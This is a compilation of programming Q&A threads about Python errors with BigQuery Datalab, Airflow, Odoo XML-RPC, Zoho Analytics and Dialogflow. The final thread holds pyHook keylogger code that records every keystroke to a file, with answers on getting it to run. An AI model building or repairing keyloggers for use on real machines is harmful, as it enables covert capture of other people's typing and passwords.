Google datalab fails to query and create table - python-3.x

I'm trying to query large amount of data in BigQuery and then upload the table in the desired dataset (datasetxxx) using "datalab" in PyCharm as the IDE. Below is my code:
query = bq.Query(sql=myQuery)
job = query.execute_async(
output_options=bq.QueryOutput.table('datasetxxx._tmp_table', mode='overwrite', allow_large_results=True))
job.result()
However, I ended up with "No project ID found". Project Id is imported through a .jason file as os.environ["GOOGLE_APPLICATION_CREDENTIALS"] = path to the file. I also tried to explicitly declare project Id above as follows.
self.project_id = 'xxxxx'
query = bq.Query(sql=myQuery, context = self.project_id)
This time I ended up with the following error:
TypeError: init() got an unexpected keyword argument 'context'.
It's also an up-to-date version. Thanks for your help.
Re: The project Id is specified in the "FROM" clause and I'm also able to see the path to the .json file using "echo" command. Below is the stack-trace:
Traceback (most recent call last):
File "xxx/Queries.py", line 265, in <module>
brwdata._extract_gbq()
File "xxx/Queries.py", line 206, in _extract_gbq
, allow_large_results=True))
File "xxx/.local/lib/python3.5/site packages/google/datalab/bigquery/_query.py", line 260, in execute_async
table_name = _utils.parse_table_name(table_name, api.project_id)
File "xxx/.local/lib/python3.5/site-packages/google/datalab/bigquery/_api.py", line 47, in project_id
return self._context.project_id
File "xxx/.local/lib/python3.5/site-packages/google/datalab/_context.py", line 62, in project_id
raise Exception('No project ID found. Perhaps you should set one by running'
Exception: No project ID found. Perhaps you should set one by running"%datalab project set -p <project-id>" in a code cell.

So, if you do "echo $GOOGLE_APPLICATION_CREDENTIALS" you can see the path of your JSON.
So, could you make sure if the "FROM" from the query has specified the right external project?
Also, if your QueryOutput destination is your very same project, you are doing it right,
table('dataset.table'.....)
But in order case you should specify:
table('project.dataset.table'....)
I don't exactly know how are you doing the query but the error might be there.
I reproduced this and it worked fine to me:
import google.datalab
from google.datalab import bigquery as bq
import os
os.environ["GOOGLE_APPLICATION_CREDENTIALS"] ="./bqauth.json"
myQuery="SELECT * FROM `MY_EXAMPLE_PROJECT.MY_EXAMPLE_DATASET.MY_EXAMPLE_TABLE` LIMIT 1000"
query = bq.Query(sql=myQuery)
job = query.execute_async(
output_options=bq.QueryOutput.table('MY_EXAMPLE_PROJECT.MY_EXAMPLE_DATASET2.MY_EXAMPLE_TABLE2', mode='overwrite', allow_large_results=True))
job.result()

Here's the updated way if someone in need:
Now you can use the Context in latest version as:
from google.datalab import bigquery as bq
from google.datalab import Context as ctx
ctx.project_id = 'PROJECT_ID'
df = bq.Query(query).execute()
...

Related

How to use bulk_load in apache airflow

I have apache airflow 2.1.4 and postgres database.
I need to insert multiple rows at a time. So I am going to use bulk_load method of PostgresHook but get error everytime.
data = pd.read_csv(open(filepath, 'rb'))
buffer = StringIO()
buffer.write(data.to_csv(index=None, header=None, sep='\t'))
buffer.seek(0)
schema_table = 'schema.table'
with PostgresHook(postgres_conn_id='my_pg_database'):
PostgresHook.bulk_load(table=schema_table, tmp_file=buffer)
The error I get:
Traceback (most recent call last):
File "/home/airflow/dags/my_python_file.py", line 76, in <module>
my_func(filepath=my_file, target_schema=schema, target_table=table)
File "/home/airflow/dags/my_python_file.py", line 39, in my_func
with PostgresHook(postgres_conn_id='my_pg_database'):
AttributeError: __enter__
I couldn't even find some examples of bulk_load usage. Would appriciate any clue. Thank you.
Postgres Hook (and any other hooks really) are not "context managers". You cannot use with: to use them.
Something like that should work:
postgres_hook = PostgresHook(postgres_conn_id='my_pg_database')
postgres_hook.bulk_load(...)

odoo create database via xmlrpc

I'm trying to script the creation a a new database + import data from other sources in odoo.
I am at the first step, creating a new database.
I have the following code, but it doesnt work :
import xmlrpc.client
print("Db name : ", end="")
db_name = input()
with xmlrpc.client.ServerProxy('127.0.0.1:8070/xmlrpc/2/db') as mod:
RES = mod.create_database(db_name, False, 'en_US')
(note that my test server does run on localhost port 8070)
The result is :
$ python3 baseodoo.py
Db name : please_work
Traceback (most recent call last):
File "baseodoo.py", line 5, in <module>
with xmlrpc.client.ServerProxy('127.0.0.1:8070/xmlrpc/2/db') as mod:
File "/usr/lib/python3.8/xmlrpc/client.py", line 1419, in __init__
raise OSError("unsupported XML-RPC protocol")
OSError: unsupported XML-RPC protocol
Am am unsure of the url ending in /db, I've got it from dispatch_rpc(…) in http.py which tests service_name for "common", "db" and "object"
Also in dispatch(…) from db.py, a method is prefixed by "exp_" so by calling create_database it should execute the exp_create_database function in db.py
I guess my reasoning is flawed but I don't know where. Help !
EDIT :
Ok I'm stupid, the url should start with "http://". Still I now get
xmlrpc.client.Fault: <Fault 3: 'Access Denied'>
EDIT2 :
There was a typo in the password I gave, so closing the question now.

Why importing data to Zoho Analytics API causes error?

My goal is to write a script in Python3 that will push data in existing table in Zoho Analytics, the script will be used by a scheduler once a week.
What I have tried to far:
I can successfully import some data using cURL commands. Like so
curl -X POST \ 'https://analyticsapi.zoho.com/api/OwnerEmail/Workspace/TableName?ZOHO_ACTION=IMPORT& ZOHO_OUTPUT_FORMAT=JSON&ZOHO_ERROR_FORMAT=JSON&ZOHO_API_VERSION=1.0&ZOHO_IMPORT_TYPE=APPEND&ZOHO_AUTO_IDENTIFY=True&ZOHO_ON_IMPORT_ERROR=ABORT&ZOHO_CREATE_TABLE=False' \ -H 'Authorization: Zoho-oauthtoken *******' \ -H 'content-type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW' \ -F ZOHO_FILE='path_to_csv'
What I found out that the ReportClient provided by Zoho Analytics team
Zoho Report Client for Python is not compatible with Python 3. Hence, I installed a wrapped for this ReportClient from [here] (https://pypi.org/project/zoho-analytics-connector).
Following sample examples from Zoho website and tests in github of wrapper for Zoho in Python3, I implement something like this:
Have a class to keep my ENV variables
import os
from zoho_analytics_connector.report_client import ReportClient, ServerError
from zoho_analytics_connector.enhanced_report_client import EnhancedZohoAnalyticsClient
class ZohoTracking:
LOGINEMAILID = os.getenv("ZOHOANALYTICS_LOGINEMAIL")
REFRESHTOKEN = os.getenv("ZOHOANALYTICS_REFRESHTOKEN")
CLIENTID = os.getenv("ZOHOANALYTICS_CLIENTID")
CLIENTSECRET = os.getenv("ZOHOANALYTICS_CLIENTSECRET")
DATABASENAME = os.getenv("ZOHOANALYTICS_DATABASENAME")
OAUTH = True
TABLENAME = "My Table"
Instantiate the Client Class
def get_enhanced_zoho_analytics_client(self) -> EnhancedZohoAnalyticsClient:
assert (not self.OAUTH and self.AUTHTOKEN) or (self.OAUTH and self.REFRESHTOKEN)
rc = EnhancedZohoAnalyticsClient(
// Just setting email, token, etc using class above
...
)
return rc```
Then have a method to upload data to existing table, the data_upload() function has the problem.
def enhanced_data_upload(self):
enhanced_client = self.get_enhanced_zoho_analytics_client()
try:
with open("./import/tracking3.csv", "r") as f:
import_content = f.read()
print(type(import_content))
except Exception as e:
print(f"Error:Check if file exists in the import directory {str(e)}")
return
res = enhanced_client.data_upload(import_content=import_content, table_name=ZohoTracking.TABLENAME)
assert res
Traceback (most recent call last):
File "push2zoho.py", line 106, in <module>
sample.enhanced_data_upload()
File "push2zoho.py", line 100, in enhanced_data_upload
res = enhanced_client.data_upload(import_content=import_content, table_name=ZohoTracking.TABLENAME)
File "/Users/.../zoho_analytics_connector/enhanced_report_client.py", line 99, in data_upload
matching_columns=matching_columns)
File "/Users/.../site-packages/zoho_analytics_connector/report_client.py", line 464, in importData_v2
r=self.__sendRequest(url=url,httpMethod="POST",payLoad=payload,action="IMPORT",callBackData=None)
File "/Users/.../zoho_analytics_connector/report_client.py", line 165, in __sendRequest
raise ServerError(respObj)
File "/Users/.../zoho_analytics_connector/report_client.py", line 1830, in __init__
contHeader = urlResp.headers["Content-Type"]
TypeError: 'NoneType' object is not subscriptable
That is the error I receive. What am I missing in this puzzle? Help is appreciated
In Feb 2021 I changed this inherited Zoho code in my library.
Now it is:
contHeader = urlResp.headers.get("Content-Type",None)
which avoids the final exception you had.

Trouble sending a batch create entity request in dialogflow

I have defined the following function. The purpose is to make batch create entity request with dialogflow client. I am using this method after sending many individual tests did not scale well.
The problem seems to be the line that defines EntityType. Seems like "entityType" is not valid but that is what is in the dialogflow v2 documentation which is the current version I am using.
Any ideas on what the issue is?
def create_batch_entity_types(self):
client = self.get_entity_client()
print(DialogFlowClient.batch_list)
EntityType = {
"entityTypes": DialogFlowClient.batch_list
}
response = client.batch_update_entity_types(parent=AGENT_PATH, entity_type_batch_inline=EntityType)
def callback(operation_future):
# Handle result.
result = operation_future.result()
print(result)
response.add_done_callback(callback)
After running the function I received this error
Traceback (most recent call last):
File "df_client.py", line 540, in <module>
create_entity_types_from_database()
File "df_client.py", line 426, in create_entity_types_from_database
df.create_batch_entity_types()
File "/Users/andrewflorial/Documents/PROJECTS/curlbot/dialogflow/dialogflow_accessor.py", line 99, in create_batch_entity_types
response = client.batch_update_entity_types(parent=AGENT_PATH, entity_type_batch_inline=EntityType)
File "/Users/andrewflorial/Documents/PROJECTS/curlbot/venv/lib/python3.7/site-packages/dialogflow_v2/gapic/entity_types_client.py", line 767, in batch_update_entity_types
update_mask=update_mask,
ValueError: Protocol message EntityTypeBatch has no "entityTypes" field.
The argument for entity_type_batch_inline must have the same form as EntityTypeBatch.
Look how that type looks like: https://dialogflow-python-client-v2.readthedocs.io/en/latest/gapic/v2/types.html#dialogflow_v2.types.EntityTypeBatch
It has to have entity_types field, not entityTypes.

No attribute 'HookManager'

I am copying the key logger from this video: (https://www.youtube.com/watch?v=8BiOPBsXh0g) and running the code:
import pyHook, sys, logging, pythoncom
file_log = 'C:\Users\User\Google Drive\Python'
def OnKeyboardEvent(event):
logging.basicConfig(filename = file_log, level = logging.DEBUG, format = '%(message)s')
chr(event.Ascii)
logging.log(10, chr(event.Ascii))
return True
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.Pumpmessages()
This returns the error:
Traceback (most recent call last):
File "C:\Users\User\Google Drive\Python\pyHook.py", line 2, in <module>
import pyHook, sys, logging, pythoncom
File "C:\Users\User\Google Drive\Python\pyHook.py", line 12, in <module>
hooks_manager = pyHook.HookManager()
AttributeError: 'module' object has no attribute 'HookManager'
I am running Python 2.7.11 and a windows computer.
I don't know what the problem is; please help.
Thank you
I found the solution. If you open HookManager.py and change all 'key_hook' words to 'keyboard_hook' no more error occurs
I'm still unsure what the issue is but I found a solution.
If you move the program you are trying to run into the same folder as the HookManager.py file then it works.
For me this file was:
C:\Python27\Lib\site-packages\pyHook
Bro this line is wrong
file_log = 'C:\Users\User\Google Drive\Python'
As the system doesn't allow your program to write to the 'C' drive, you should use another path, like 'D' drive or 'E' drive or etc. as given below.
file_log = 'D:\keyloggerOutput.txt'
I had same message error after having installed pyWinhook-1.6.1 on Python 3.7 with the zip file pyWinhook-1.6.1.zip.
In application file, I replaced the import statement:" import pyWinhook as pyHook" with "from pywinhook import *". The problem was then solved.

Resources